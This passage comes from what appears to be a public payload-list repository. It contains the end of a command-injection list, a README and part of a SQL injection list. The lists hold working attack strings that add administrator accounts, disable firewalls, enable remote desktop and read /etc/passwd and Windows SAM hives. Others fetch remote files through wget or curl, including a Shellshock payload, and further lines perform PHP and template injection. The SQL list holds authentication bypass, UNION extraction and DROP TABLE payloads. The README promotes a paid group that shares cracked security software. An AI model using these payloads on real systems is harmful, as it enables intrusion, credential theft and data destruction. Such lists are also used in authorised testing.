INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n 270 | \necho INJECTX\nexit\n\033[2Asleep 5\n 271 | \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n 272 | | net localgroup Administrators hacker /ADD 273 | ; net localgroup Administrators hacker /ADD 274 | & net localgroup Administrators hacker /ADD 275 | && net localgroup Administrators hacker /ADD 276 | net localgroup Administrators hacker /ADD 277 | | netsh firewall set opmode disable 278 | ; netsh firewall set opmode disable 279 | & netsh firewall set opmode disable 280 | && netsh firewall set opmode disable 281 | netsh firewall set opmode disable 282 | netstat 283 | ;netstat -a; 284 | | netstat -an 285 | ; netstat -an 286 | & netstat -an 287 | && netstat -an 288 | netstat -an 289 | | net user hacker Password1 /ADD 290 | ; net user hacker Password1 /ADD 291 | & net user hacker Password1 /ADD 292 | && net user hacker Password1 /ADD 293 | net user hacker Password1 /ADD 294 | | net view 295 | ; net view 296 | & net view 297 | && net view 298 | net view 299 | \nid| 300 | \nid; 301 | \nid\n 302 | \n/usr/bin/id\n 303 | perl -e 'print "X"x1024' 304 | || perl -e 'print "X"x16096' 305 | | perl -e 'print "X"x16096' 306 | ; perl -e 'print "X"x16096' 307 | & perl -e 'print "X"x16096' 308 | && perl -e 'print "X"x16096' 309 | perl -e 'print "X"x16384' 310 | ; perl -e 'print "X"x2048' 311 | & perl -e 'print "X"x2048' 312 | && perl -e 'print "X"x2048' 313 | perl -e 'print "X"x2048' 314 | || perl -e 'print "X"x4096' 315 | | perl -e 'print "X"x4096' 316 | ; perl -e 'print "X"x4096' 317 | & perl -e 'print "X"x4096' 318 | && perl -e 'print "X"x4096' 319 | perl -e 'print "X"x4096' 320 | || perl -e 'print "X"x8096' 321 | | perl -e 'print "X"x8096' 322 | ; perl -e 'print "X"x8096' 323 | && perl -e 'print "X"x8096' 324 | perl -e 'print "X"x8192' 325 | perl -e 'print "X"x81920' 326 | || phpinfo() 327 | | phpinfo() 328 | {${phpinfo()}} 329 | ;phpinfo() 330 | ;phpinfo();// 331 | ';phpinfo();// 332 | {${phpinfo()}} 333 | & phpinfo() 334 | && phpinfo() 335 | phpinfo() 336 | phpinfo(); 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | :phpversion(); 346 | `ping 127.0.0.1` 347 | & ping -i 30 127.0.0.1 & 348 | & ping -n 30 127.0.0.1 & 349 | ;${@print(md5(RCEVulnerable))}; 350 | ${@print("RCEVulnerable")} 351 | ${@print(system($_SERVER['HTTP_USER_AGENT']))} 352 | pwd 353 | | pwd 354 | ; pwd 355 | & pwd 356 | && pwd 357 | \r 358 | | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 359 | ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 360 | & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 361 | && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 362 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 363 | \r\n 364 | route 365 | | sleep 1 366 | ; sleep 1 367 | & sleep 1 368 | && sleep 1 369 | sleep 1 370 | || sleep 10 371 | | sleep 10 372 | ; sleep 10 373 | {${sleep(10)}} 374 | & sleep 10 375 | && sleep 10 376 | sleep 10 377 | || sleep 15 378 | | sleep 15 379 | ; sleep 15 380 | & sleep 15 381 | && sleep 15 382 | {${sleep(20)}} 383 | {${sleep(20)}} 384 | {${sleep(3)}} 385 | {${sleep(3)}} 386 | | sleep 5 387 | ; sleep 5 388 | & sleep 5 389 | && sleep 5 390 | sleep 5 391 | {${sleep(hexdec(dechex(20)))}} 392 | {${sleep(hexdec(dechex(20)))}} 393 | sysinfo 394 | | sysinfo 395 | ; sysinfo 396 | & sysinfo 397 | && sysinfo 398 | ;system('cat%20/etc/passwd') 399 | system('cat C:\boot.ini'); 400 | system('cat config.php'); 401 | system('cat /etc/passwd'); 402 | || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 403 | | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 404 | ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 405 | & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 406 | && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 407 | system('curl https://crowdshield.com/.testing/rce_vuln.txt') 408 | system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') 409 | system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); 410 | system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 411 | systeminfo 412 | | systeminfo 413 | ; systeminfo 414 | & systeminfo 415 | && systeminfo 416 | system('ls') 417 | system('pwd') 418 | system('pwd'); 419 | || system('sleep 5'); 420 | | system('sleep 5'); 421 | ; system('sleep 5'); 422 | & system('sleep 5'); 423 | && system('sleep 5'); 424 | system('sleep 5') 425 | system('sleep 5'); 426 | system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') 427 | system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); 428 | system('whoami') 429 | system('whoami'); 430 | test*; ls -lhtR /var/www/ 431 | test* || perl -e 'print "X"x16096' 432 | test* | perl -e 'print "X"x16096' 433 | test* & perl -e 'print "X"x16096' 434 | test* && perl -e 'print "X"x16096' 435 | test*; perl -e 'print "X"x16096' 436 | $(`type C:\boot.ini`) 437 | &&type C:\\boot.ini 438 | | type C:\Windows\repair\SAM 439 | ; type C:\Windows\repair\SAM 440 | & type C:\Windows\repair\SAM 441 | && type C:\Windows\repair\SAM 442 | type C:\Windows\repair\SAM 443 | | type C:\Windows\repair\SYSTEM 444 | ; type C:\Windows\repair\SYSTEM 445 | & type C:\Windows\repair\SYSTEM 446 | && type C:\Windows\repair\SYSTEM 447 | type C:\Windows\repair\SYSTEM 448 | | type C:\WINNT\repair\SAM 449 | ; type C:\WINNT\repair\SAM 450 | & type C:\WINNT\repair\SAM 451 | && type C:\WINNT\repair\SAM 452 | type C:\WINNT\repair\SAM 453 | type C:\WINNT\repair\SYSTEM 454 | | type %SYSTEMROOT%\repair\SAM 455 | ; type %SYSTEMROOT%\repair\SAM 456 | & type %SYSTEMROOT%\repair\SAM 457 | && type %SYSTEMROOT%\repair\SAM 458 | type %SYSTEMROOT%\repair\SAM 459 | | type %SYSTEMROOT%\repair\SYSTEM 460 | ; type %SYSTEMROOT%\repair\SYSTEM 461 | & type %SYSTEMROOT%\repair\SYSTEM 462 | && type %SYSTEMROOT%\repair\SYSTEM 463 | type %SYSTEMROOT%\repair\SYSTEM 464 | uname 465 | ;uname; 466 | | uname -a 467 | ; uname -a 468 | & uname -a 469 | && uname -a 470 | uname -a 471 | |/usr/bin/id 472 | ;|/usr/bin/id| 473 | ;/usr/bin/id| 474 | $;/usr/bin/id 475 | () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' 476 | () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 477 | | wget http://crowdshield.com/.testing/rce.txt 478 | & wget http://crowdshield.com/.testing/rce.txt 479 | ; wget https://crowdshield.com/.testing/rce_vuln.txt 480 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) 481 | && wget https://crowdshield.com/.testing/rce_vuln.txt 482 | wget https://crowdshield.com/.testing/rce_vuln.txt 483 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) 484 | which curl 485 | which gcc 486 | which nc 487 | which netcat 488 | which perl 489 | which python 490 | which wget 491 | whoami 492 | | whoami 493 | ; whoami 494 | ' whoami 495 | ' || whoami 496 | ' & whoami 497 | ' && whoami 498 | '; whoami 499 | " whoami 500 | " || whoami 501 | " | whoami 502 | " & whoami 503 | " && whoami 504 | "; whoami 505 | $(`whoami`) 506 | & whoami 507 | && whoami 508 | {{ get_user_file("C:\boot.ini") }} 509 | {{ get_user_file("/etc/hosts") }} 510 | {{ get_user_file("/etc/passwd") }} 511 | {{4+4}} 512 | {{4+8}} 513 | {{person.secret}} 514 | {{person.name}} 515 | {1} + {1} 516 | {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} 517 | {{[] .__ Class __.__ base __.__ subclasses __ ()}} -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload-List 2 | 整理SQLI、XSS、RCE、Path的payload文件备份留存 3 | 4 | 5 | ### Hi there 👋 6 | 7 | 21 | 22 | ![](https://komarev.com/ghpvc/?username=ExpLangcn) 23 | 24 | - 😄 I’m ExpLang 25 | - 我的后续安全项目将会发布在:**[Security-Magic-Weapon 组织](https://github.com/Security-Magic-Weapon) 点击查看!** 26 | - Telegram频道:**[安全技术资讯聚合](https://t.me/sec_info) 实时更新国内外700+个黑客安全技术论坛/社区/博客/公众号的技术文章.** 27 | - Telegram频道:**[安全资源整合互推](https://t.me/secyq) 一个用于收录Telegram上 安全行业 黑客技术 并且还会自动推送最新的CVE漏洞、CNVD漏洞、最新的红队工具等。** 28 | 29 | ### 我的个人知识星球 30 | 31 | 本星球会**每日更新**全网优秀安全资源包括但不限于:**安全工具**、**安全脚本**、**安全学习资料**、**安全商业产品的破解版**等,资源方向均与安全各领域相关。 32 | 33 | 本星球建有运营微信群可及时在群内反馈和互动(索取安全资源),并在运营微信群内拥有Bot机器人用于通知星球最新动态方便各位星友不错过任何优秀动态。 34 | 35 | 本星球会针对安全资源进行**严格的分类**,方便各位星友可以**快速定位**自己所需的资源,及给各位星友带来更好的**阅读体验**。 36 | 37 | 本星球会**每月**进行一次**优质资源统计**,会根据本阅读点赞/评论/阅读/下载最多的资源进行排序方便大家更好的浏览。 38 | 39 | 并且本星球将会**每季度**进行一次**星友知识共享直播**,仅限本星球的星友参与,直播会邀请星球内的部分大佬或在外部邀请在某领域有所建设的大佬进行**免费的知识共享**,并且本星球的续费折扣是平台的最低**5折折扣**! 40 | 41 | 42 | 43 | 44 | 45 | --- 46 | 47 | 50 | 51 |
52 | 53 | 54 | 55 | 56 | 57 | 58 |
59 | -------------------------------------------------------------------------------- /SQLI.txt: -------------------------------------------------------------------------------- 1 | 8888'+AND+'1'+LIKE+'1 --> 2 | 8888'+AND+'2'+LIKE+'1 --> 3 | 8888'+AND+(@@TEXTSIZE>@@LANGID)+AND+'1'+LIKE+'1 --> 4 | 8888'+AND+(@@LANGID>@@TEXTSIZE)+'1'+LIKE+'1 --> 5 | '-' 6 | ' ' 7 | '&' 8 | '^' 9 | '*' 10 | ' or ''-' 11 | ' or '' ' 12 | ' or ''&' 13 | ' or ''^' 14 | ' or ''*' 15 | "-" 16 | " " 17 | "&" 18 | "^" 19 | "*" 20 | " or ""-" 21 | " or "" " 22 | " or ""&" 23 | " or ""^" 24 | " or ""*" 25 | or true-- 26 | " or true-- 27 | ' or true-- 28 | ") or true-- 29 | ') or true-- 30 | ' or 'x'='x 31 | ') or ('x')=('x 32 | ')) or (('x'))=(('x 33 | " or "x"="x 34 | ") or ("x")=("x 35 | ")) or (("x"))=(("x 36 | or 1=1 37 | or 1=1-- 38 | or 1=1# 39 | or 1=1/* 40 | admin' -- 41 | admin' # 42 | admin'/* 43 | admin' or '1'='1 44 | admin' or '1'='1'-- 45 | admin' or '1'='1'# 46 | admin' or '1'='1'/* 47 | admin'or 1=1 or ''=' 48 | admin' or 1=1 49 | admin' or 1=1-- 50 | admin' or 1=1# 51 | admin' or 1=1/* 52 | admin') or ('1'='1 53 | admin') or ('1'='1'-- 54 | admin') or ('1'='1'# 55 | admin') or ('1'='1'/* 56 | admin') or '1'='1 57 | admin') or '1'='1'-- 58 | admin') or '1'='1'# 59 | admin') or '1'='1'/* 60 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 61 | admin" -- 62 | admin" # 63 | admin"/* 64 | admin" or "1"="1 65 | admin" or "1"="1"-- 66 | admin" or "1"="1"# 67 | admin" or "1"="1"/* 68 | admin"or 1=1 or ""=" 69 | admin" or 1=1 70 | admin" or 1=1-- 71 | admin" or 1=1# 72 | admin" or 1=1/* 73 | admin") or ("1"="1 74 | admin") or ("1"="1"-- 75 | admin") or ("1"="1"# 76 | admin") or ("1"="1"/* 77 | admin") or "1"="1 78 | admin") or "1"="1"-- 79 | admin") or "1"="1"# 80 | admin") or "1"="1"/* 81 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 82 | ‘-sqlite_version()%20UNION%20SELECT%20password%20FROM%20users-%20- 83 | sleep(9999) 84 | )-sleep(9999 85 | 1337%20INTO%20OUTFILE%20‘xxx’-- 86 | 1337)%20INTO%20OUTFILE%20‘xxx’-- 87 | 123;DROP%20TABLE%20users-- 88 | 123);DROP%20TABLE%20users-- 89 | )%20OR%20(SELECT%20password%20FROM%20users%20... 90 | */UNION%20SELECT%20password%20FROM%20users-- 91 | 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' 92 | 'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR' 93 | 'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'a:1:{s:+13:":new:username";O:67:"EllisLab\\\ExpressionEngine\\\Library\\\Parser\\\Conditional\\\Token\\\Variable":1:{s:+6:"lexeme";s:+'.$length.':"1+UNION+SELECT+SLEEP(5)+#+'.$garbage.'";}}&()o1: select * from users where id=1 or (\)=1 union select 1,@@VERSION -- 1 94 | &(.)o: select * from users where id=1 or (\.)=1 union select 1,@@VERSION -- 1 95 | &(1&1: select * from users where id=1 or (\+)=1 or 1=1 -- 1 96 | &(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1 97 | &(1UE: select * from users where id=1 or (\+)=1 union select 1,@@VERSION -- 1 98 | &(n&1: select * from users where id=1 or ($+)=1 or 1=1 -- 1 99 | &(nUE: select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1 100 | &.o&1: select * from users where id=1 or \.<\ or 1=1 -- 1 101 | &.o1&: select * from users where id=1 or \.<1 or 1=1 -- 1 102 | &.o1U: select * from users where id=1 or \.<1 union select 1,@@VERSION -- 1 103 | &.oUE: select * from users where id=1 or \.<\ union select 1,@@VERSION -- 1 104 | &.on&: select * from users where id=1 or \.<$ or 1=1 -- 1 105 | &.onU: select * from users where id=1 or \.<$ union select 1,@@VERSION -- 1 106 | &.oo1: select * from users where id=1 or \.< =1 union select 1,@@VERSION -- 1 107 | &1UE1: select * from users where id=1 ||1 union select 1,banner from v$version where rownum=1 -- 1 108 | &1UEv: select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1 109 | &1c: select * from users where id=1 or 1=1 -- 1 110 | &1oo&: select * from users where id=1 or \+<\ or 1=1 -- 1 111 | &1oo1: select * from users where id=1 or 1<@=1 union select 1,version() -- 1 112 | &1ooU: select * from users where id=1 or \+<\ union select 1,@@VERSION -- 1 113 | &1oon: select * from users where id=1 or \+<$ union select 1,@@VERSION -- 1 114 | &1ovc: select * from users where id=1 or 1&@#=1 union select 1,version() -- 1 115 | &n.o1: select * from users where id=1 or $ .=1 union select 1,@@VERSION -- 1 116 | &n1&1: select * from users where id=1 or $ 1=1 or 1=1 -- 1 117 | &n1UE: select * from users where id=1 or $ 1=1 union select 1,@@VERSION -- 1 118 | &no&1: select * from users where id=1 or $<\ or 1=1 -- 1 119 | &no.&: select * from users where id=1 or $<\. or 1=1 -- 1 120 | &no.U: select * from users where id=1 or $<\. union select 1,@@VERSION -- 1 121 | &noUE: select * from users where id=1 or $<\ union select 1,@@VERSION -- 1 122 | &noo&: select * from users where id=1 or $+<\ or 1=1 -- 1 123 | &noo1: select * from users where id=1 or $+<1 union select 1,@@VERSION -- 1 124 | &nooU: select * from users where id=1 or $+<\ union select 1,@@VERSION -- 1 125 | &noon: select * from users where id=1 or $+<$ union select 1,@@VERSION -- 1 126 | &o.&1: select * from users where id=1 or \<\. or 1=1 -- 1 127 | &o.UE: select * from users where id=1 or \<\. union select 1,@@VERSION -- 1 128 | &o1&1: select * from users where id=1 or \<1 or 1=1 -- 1 129 | &o1UE: select * from users where id=1 or \<1 union select 1,@@VERSION -- 1 130 | &oUE1: select * from users where id=1 or \<\ union select 1,@@VERSION -- 1 131 | &oUEv: select * from users where id=1 or \<\ union select null,@@VERSION -- 1 132 | &on&1: select * from users where id=1 or \<$ or 1=1 -- 1 133 | &onUE: select * from users where id=1 or \<$ union select 1,@@VERSION -- 1 134 | &oo1&: select * from users where id=1 or \< =1 or 1=1 -- 1 135 | &oo1U: select * from users where id=1 or \< =1 union select 1,@@VERSION -- 1 136 | &ov&1: select * from users where id=1 or !<@ or 1=1 -- 1 137 | &ovUE: select * from users where id=1 or !<@ union select 1,version() -- 1 138 | &v: select * from users where id=1 or @`\` union select 1,version() -- 1 139 | &vc: select * from users where id=1 or @$#=1 union select 1,version() -- 1 140 | &voo1: select * from users where id=1 or @<@=1 union select 1,version() -- 1 141 | )&1c: select * from users where id=1 +(\) or 1=1 -- 1 142 | )UEvc: select * from users where id=1 +(\) union select null,@@VERSION -- 1 143 | .&1UE: select * from users where id=1.&&1 union select 1,version() -- 1 144 | .&1c: select * from users where id=1. or 1=1 -- 1 145 | .&vUE: select * from users where id=1.&&@ union select 1,version() -- 1 146 | .)&1c: select * from users where id=1 + (\.) or 1=1 -- 1 147 | .)UEv: select * from users where id=1 + (\.) union select null,@@VERSION -- 1 148 | .UE1,: select * from users where id=1. union select 1,version() -- 1 149 | .UE1k: select * from users where id=1. union select 1,banner from v$version where rownum=1 -- 1 150 | .UEf(: select * from users where id=1. union select version(),version() -- 1 151 | .UEv,: select * from users where id=1. union select null,version() -- 1 152 | .UEvc: select * from users where id=1 +\. union select null,@@VERSION -- 1 153 | .UEvk: select * from users where id=1. union select null,banner from v$version where rownum=1 -- 1 154 | .o&1c: select * from users where id=1. <@ or 1=1 -- 1 155 | .o.&1: select * from users where id=1.<@. or 1=1 -- 1 156 | .o.UE: select * from users where id=1.<@. union select 1,version() -- 1 157 | .o1&1: select * from users where id=1.*1 or 1=1 -- 1 158 | .o1UE: select * from users where id=1.*1 union select 1,banner from v$version where rownum=1 -- 1 159 | .o1c: select * from users where id=1.<1# union select 1,version() -- 1 160 | .oUE1: select * from users where id=1. <@ union select 1,version() -- 1 161 | .oUEf: select * from users where id=1. <@ union select version(),version() -- 1 162 | .oUEv: select * from users where id=1.*\ union select null,@@VERSION -- 1 163 | .on&1: select * from users where id=1.<@$ or 1=1 -- 1 164 | .onUE: select * from users where id=1.<@$ union select 1,version() -- 1 165 | .ov&1: select * from users where id=1.%@ or 1=1 -- 1 166 | .ovUE: select * from users where id=1.%@ union select 1,version() -- 1 167 | 1&1UE: select * from users where id=11||1 union select 1,banner from v$version where rownum=1 -- 1 168 | 1&1c: select * from users where id=1 +1 or 1=1 -- 1 169 | 1)&1c: select * from users where id=1 +(1) or 1=1 -- 1 170 | 1)UE1: select * from users where id=1 +(1) union select 1,banner from v$version where rownum=1 -- 1 171 | 1)UEv: select * from users where id=1 +(1) union select null,banner from v$version where rownum=1 -- 1 172 | 1UE1k: select * from users where id=1 +1 union select 1,banner from v$version where rownum=1 -- 1 173 | 1UEvk: select * from users where id=1 +1 union select null,banner from v$version where rownum=1 -- 1 174 | 1c: select * from users where id=11<1# union select 1,version() -- 1 175 | 1o)&1: select * from users where id=1 + (\+) or 1=1 -- 1 176 | 1o)UE: select * from users where id=1 + (\+) union select null,@@VERSION -- 1 177 | 1o.UE: select * from users where id=1 +\+. union select null,@@VERSION -- 1 178 | 1oUE1: select * from users where id=1 -1<@ union select 1,version() -- 1 179 | 1oUEf: select * from users where id=1 +1<@ union select version(),version() -- 1 180 | 1oUEv: select * from users where id=1 +1<@ union select null,version() -- 1 181 | 1oo&1: select * from users where id=1 + \+%\ or 1=1 -- 1 182 | 1oo1&: select * from users where id=1 + \+%1 or 1=1 -- 1 183 | 1oo1U: select * from users where id=1 + \+%1 union select null,@@VERSION -- 1 184 | 1ooUE: select * from users where id=1 + \+*\ union select null,@@VERSION -- 1 185 | 1oon&: select * from users where id=1 + \+%$ or 1=1 -- 1 186 | 1oonU: select * from users where id=1 + \+*$ union select null,@@VERSION -- 1 187 | UE(1): select * from users where id=1 union select (1),banner from v$version where rownum=1 -- 1 188 | UE1&1: select * from users where id=1 union select 1||1,version() -- 1 189 | UE1&v: select * from users where id=1 union select 1||@,version() -- 1 190 | UE111: select * from users where id=1 union select 1 1$,version() -- 1 191 | UE11f: select * from users where id=1 union select 1 $,version() -- 1 192 | UE11n: select * from users where id=1 union select 1 1a,version() -- 1 193 | UE1f(: select * from users where id=1 union select 1<@$,version() -- 1 194 | UE1kn: select * from users where id=1 union select 1,banner from v$version where rownum=1 -- 1 195 | UE1n,: select * from users where id=1 union select .1_,version() -- 1 196 | UE1n: select * from users where id=1 union select 1`\`,version() -- 1 197 | UE1nc: select * from users where id=1 union select 1a#,banner from v$version where rownum=1 -- 1 198 | UE1nk: select * from users where id=1 union select 1a,banner from v$version where rownum=1 -- 1 199 | UE1nn: select * from users where id=1 union select .1$_,version() -- 1 200 | UE1o,: select * from users where id=1 union select 1<@,version() -- 1 201 | UE1o.: select * from users where id=1 union select 1<@.,version() -- 1 202 | UE1s: select * from users where id=1 union select 1 $$,version() -- 1 203 | UEo1,: select * from users where id=1 union select !<1,version() -- 1 204 | UEoo1: select * from users where id=1 union select +!<1,version() -- 1 205 | UEoov: select * from users where id=1 union select +!<@,version() -- 1 206 | UEov,: select * from users where id=1 union select !<@,version() -- 1 207 | UEv&1: select * from users where id=1 union select @||1,version() -- 1 208 | UEv&v: select * from users where id=1 union select @&&@,version() -- 1 209 | UEv11: select * from users where id=1 union select @ 1$,version() -- 1 210 | UEv1f: select * from users where id=1 union select @ $,version() -- 1 211 | UEv1n: select * from users where id=1 union select @ 1a,version() -- 1 212 | UEvf(: select * from users where id=1 union select @<@$,version() -- 1 213 | UEvkn: select * from users where id=1 union select null,banner from v$version where rownum=1 -- 1 214 | UEvn,: select * from users where id=1 union select @ _,version() -- 1 215 | UEvnn: select * from users where id=1 union select @ $_,version() -- 1 216 | UEvo,: select * from users where id=1 union select @<@,version() -- 1 217 | UEvo.: select * from users where id=1 union select @<@.,version() -- 1 218 | UEvs: select * from users where id=1 union select @ $$,version() -- 1 219 | n.&1c: select * from users where id=1 +$ . or 1=1 -- 1 220 | n.UEv: select * from users where id=1 +$ . union select null,@@VERSION -- 1 221 | n1&1c: select * from users where id=1 +$ 1 or 1=1 -- 1 222 | n1UEv: select * from users where id=1 +$ 1 union select null,@@VERSION -- 1 223 | no&1c: select * from users where id=1 +$+ or 1=1 -- 1 224 | no)&1: select * from users where id=1 + ($+) or 1=1 -- 1 225 | no)UE: select * from users where id=1 + ($+) union select null,@@VERSION -- 1 226 | no.&1: select * from users where id=1 +$+. or 1=1 -- 1 227 | no.UE: select * from users where id=1 +$+. union select null,@@VERSION -- 1 228 | noUEv: select * from users where id=1 +$+ union select null,@@VERSION -- 1 229 | noo&1: select * from users where id=1 + $+%\ or 1=1 -- 1 230 | noo1&: select * from users where id=1 + $+%1 or 1=1 -- 1 231 | noo1U: select * from users where id=1 + $+%1 union select null,@@VERSION -- 1 232 | nooUE: select * from users where id=1 + $+*\ union select null,@@VERSION -- 1 233 | noon&: select * from users where id=1 + $+%$ or 1=1 -- 1 234 | noonU: select * from users where id=1 + $+*$ union select null,@@VERSION -- 1 235 | o&1c: select * from users where id=1 <@ or 1=1 -- 1 236 | o()&1: select * from users where id=1 %(\) or 1=1 -- 1 237 | o()UE: select * from users where id=1 *(\) union select null,@@VERSION -- 1 238 | o(1)&: select * from users where id=1 %(1) or 1=1 -- 1 239 | o(1)U: select * from users where id=1 *(1) union select 1,banner from v$version where rownum=1 -- 1 240 | o(n)&: select * from users where id=1 %($) or 1=1 -- 1 241 | o(v)&: select * from users where id=1 %(@) or 1=1 -- 1 242 | o.&1c: select * from users where id=1 <@. or 1=1 -- 1 243 | o..&1: select * from users where id=1 <@.. or 1=1 -- 1 244 | o..UE: select * from users where id=1<@.. union select 1,version() -- 1 245 | o.UE1: select * from users where id=1 <@. union select 1,version() -- 1 246 | o.UEf: select * from users where id=1 <@. union select version(),version() -- 1 247 | o.UEv: select * from users where id=1 *\. union select null,@@VERSION -- 1 248 | o.n&1: select * from users where id=1 <@.$ or 1=1 -- 1 249 | o.nUE: select * from users where id=1 <@.$ union select 1,version() -- 1 250 | o1&1c: select * from users where id=1 *1 or 1=1 -- 1 251 | o1UE1: select * from users where id=1 *1 union select 1,banner from v$version where rownum=1 -- 1 252 | o1UEv: select * from users where id=1 *1 union select null,banner from v$version where rownum=1 -- 1 253 | o1c: select * from users where id=1 <1## union select 1,version() -- 1 254 | o1n&1: select * from users where id=1 <@1$ or 1=1 -- 1 255 | o1nUE: select * from users where id=1 <@1$ union select 1,version() -- 1 256 | oUEvc: select * from users where id=1 *\ union select null,@@VERSION -- 1 257 | on&1c: select * from users where id=1 <@$ or 1=1 -- 1 258 | on.&1: select * from users where id=1 %$ . or 1=1 -- 1 259 | on.UE: select * from users where id=1 *$ . union select null,@@VERSION -- 1 260 | on1&1: select * from users where id=1 %$ 1 or 1=1 -- 1 261 | on1UE: select * from users where id=1 %$ 1 union select null,@@VERSION -- 1 262 | onn&1: select * from users where id=1 <@$_ or 1=1 -- 1 263 | onnUE: select * from users where id=1 <@$_ union select 1,version() -- 1 264 | oo&1c: select * from users where id=1 <@<@ or 1=1 -- 1 265 | oo1&1: select * from users where id=1 %!<1 or 1=1 -- 1 266 | oo1UE: select * from users where id=1 | |1 union select 1,banner from v$version where rownum=1 -- 1 267 | ooUE1: select * from users where id=1<@<@ union select 1,version() -- 1 268 | ooUEf: select * from users where id=1 <@<@ union select version(),version() -- 1 269 | ooUEv: select * from users where id=1 <@<@ union select null,version() -- 1 270 | oov&1: select * from users where id=1 %!<@ or 1=1 -- 1 271 | oovUE: select * from users where id=1 <@&@ union select 1,version() -- 1 272 | os: select * from users where id=1 <@$$ union select 1,version() -- 1 273 | ov&1c: select * from users where id=1 &@ or 1=1 -- 1 274 | s&&o1: select * from users where id='1' or ||/1=1 union select 1,version() -- 1' 275 | s&()o: select * from users where id='1' or (\)=1 union select 1,@@VERSION -- 1' 276 | s&(.): select * from users where id='1' or (\.)=1 union select 1,@@VERSION -- 1' 277 | s&(1): select * from users where id='1' or (1)=1 union select 1,banner from v$version where rownum=1 -- 1' 278 | s&.o&: select * from users where id='1' or \.<\ or 